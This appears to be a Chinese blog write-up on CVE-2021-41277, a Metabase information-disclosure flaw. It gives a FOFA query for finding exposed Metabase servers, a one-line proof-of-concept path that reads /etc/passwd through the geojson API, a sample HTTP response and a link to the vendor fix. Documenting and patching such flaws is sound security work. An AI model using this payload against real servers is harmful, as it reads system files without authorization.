CVE-2021-41277——Metabase 信息泄露漏洞

最新推荐文章于 2025-06-12 08:14:43 发布

原创最新推荐文章于 2025-06-12 08:14:43 发布 · 1.1w 阅读

9 ·

CC 4.0 BY-SA版权

文章标签：

#CVE-2021-41277 #安全漏洞

漏洞验证及复现专栏收录该内容

33 篇文章

订阅专栏

Metabase存在信息泄露漏洞，源于admin设置中的自定义地图功能未进行权限验证。攻击者可利用此漏洞获取敏感信息。CNNVD评级为超危。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Metabase 信息泄露漏洞

在这里插入图片描述

漏洞简介

Metabase是美国Metabase公司的一个开源数据分析平台。

Metabase 中存在信息泄露漏洞，该漏洞源于产品的 admin-＞settings-＞maps-＞custom maps-＞add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。

CNNVD编号：CNNVD-202111-1565
危害等级：超危
CVE编号： CVE-2021-41277

FOFA语法

app="Metabase"

在这里插入图片描述

POC

"{{BaseURL}}/api/geojson?url=file:/etc/passwd"

参考

https://github.com/0x0021h/expbox/blob/main/CVE-2021-41277.yaml

漏洞测试

在这里插入图片描述

在这里插入图片描述
返回200

HTTP/1.1 200 OK
Server: nginx/1.16.0
Date: Sun, 21 Nov 2021 03:04:41 GMT
Content-Type: text/html;charset=utf-8
Connection: close
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Last-Modified: Sun, 21 Nov 2021 03:04:41 +0000
Strict-Transport-Security: max-age=31536000
X-Permitted-Cross-Domain-Policies: none
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'none'; script-src 'self' 'unsafe-eval' https://maps.google.com https://apis.google.com https://www.google-analytics.com https://*.googleapis.com *.gstatic.com  'sha256-lMAh4yjVuDkQ9NqkK4H+YHUga+anpFs5JAuj/uZh0Rs=' 'sha256-7t0fjA/BVlVoDzQGo5fjx1QcGZGP/YHzqHjtle6rQr0=' 'sha256-JJa56hyDfUbgNfq+0nq6Qs866JKgZ/+qCq2pkDJED8k='; child-src 'self' https://accounts.google.com; style-src 'self' 'unsafe-inline'; font-src 'self' ; img-src * 'self' data:; connect-src 'self' metabase.us10.list-manage.com ; manifest-src 'self';
Expires: Tue, 03 Jul 2001 06:00:00 GMT
Content-Length: 162961
......

漏洞修复

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr